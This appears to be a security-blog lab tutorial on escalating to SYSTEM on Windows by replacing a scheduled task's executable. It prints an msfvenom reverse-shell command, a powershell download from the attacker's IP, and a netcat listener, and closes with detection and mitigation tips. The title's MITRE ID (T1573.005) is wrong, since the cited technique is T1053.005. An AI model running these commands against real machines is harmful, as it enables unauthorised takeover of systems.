Windows Privilege Escalation: Scheduled Task/Job (T1573.005)
An attacker can exploit Windows Task Scheduler to schedule malicious programs for initial or recurrent execution. For persistence, the attacker typically uses Windows Task Scheduler to launch applications at system startup or at predefined intervals. Furthermore, the attacker executes remote code under the context of a specified account to achieve Privilege Escalation.
Table of Content
- Task Scheduler
- Misconfigured Scheduled Task/Job
- Prerequisite
- Lab Setup
- Abusing Schedule Task/Job
- Detection
- Mitigation
Task Scheduler
You can easily schedule an automatic job using the Task Scheduler service. When you utilize this service, you set up any program to run at a specific date and time that suits your needs. Subsequently, Task Scheduler evaluates the defined time or event criteria and runs the task once those conditions are met.
Misconfigured Scheduled Task/Job
An attacker can perform execution, persistence or privilege escalation by abusing any script, program, or service that is running automatically through the task scheduler.
Mitre ID: T1573.005
Tactics: Execution, Persistence, Privilege Escalation
Platforms: Windows
Prerequisite
Target Machine: Windows 10
Attacker Machine: Kali Linux
Condition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc.
Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting the Scheduled Task/Job.
Lab Setup
Run Task Scheduler from inside the program menu.
Step1: Explore the Task Schedule Library to create a new Task.
Step2: Assign a task for the logged user to be executed as the highest privileges.
Step3: Choose the Trigger option to initiate a scheduled task/job.
Step4: Here we have scheduled the task for recurrence occurrence.
Step5: When you create a task, you must specify the action that will occur when your task starts.
Step6: Specify the type of action to be performed by a scheduled task. For example schedule backup of a system through some executable program.
Step7: Thus schedule tasks will be triggered every day at a specific time for taking backup or schedule job to define as action.
Abusing Schedule Task/Job
Step8: An attacker can escalate privileges by exploiting Schedule Task/Job. Following an initial foothold, we can query to obtain the list for the scheduled task.
schtasks /query /fo LIST /V
This helps an attack to understand which application is attached to execute Job at what time.
To obtain a reverse shell as NT Authority SYSTEM, first create a malicious EXE file that a scheduled task can execute. Using Msfvenom, we then generate the EXE file and inject it into the target system accordingly.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 -f exe > shell.exe
To abuse the scheduled Task, the attacker will either modify the application by overwriting it or may replace the original file from the duplicate. To insert a duplicate file in the same directory, we rename the original file as a file.bak.
Then downloaded malicious file.exe in the same directory with the help of wget command.
powershell wget 192.168.1.3/shell.exe –o file.exe
Once the duplicate file.exe is injected in the same directory then, the file.exe will be executed automatically through Task Scheduler. As attackers make sure that netcat listener must be at listening mode for obtaining reverse connection for privilege shell.
nc -lvp 8888 whoami /priv
Detection
- Tools such as Sysinternals Autoruns can detect system changes like showing presently scheduled jobs.
- Tools like TCPView & Process Explore may help to identify remote connections for suspicious services or processes.
- View Task Properties and History: To view a task’s properties and history by using a command line
Schtasks /Query /FO LIST /V
- Enable the “Microsoft-Windows-TaskScheduler/Operational” configuration inside the event logging service to report scheduled task creation and updates.
Mitigation
- Perform an audit scan to find out week or misconfiguration with the help of automated script using tools such as WinPeas, SharpUp, etc. Read more from here “Window Privilege Escalation: Automated Script”.
- Make sure the scheduled task should not be run as SYSTEM.
Configure scheduled tasks to execute as the authenticated account instead of SYSTEM. The associated Registry key is located at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl.
The setting can be configured through GPO:
Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled
Reference:
https://attack.mitre.org/techniques/T1053/002/
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here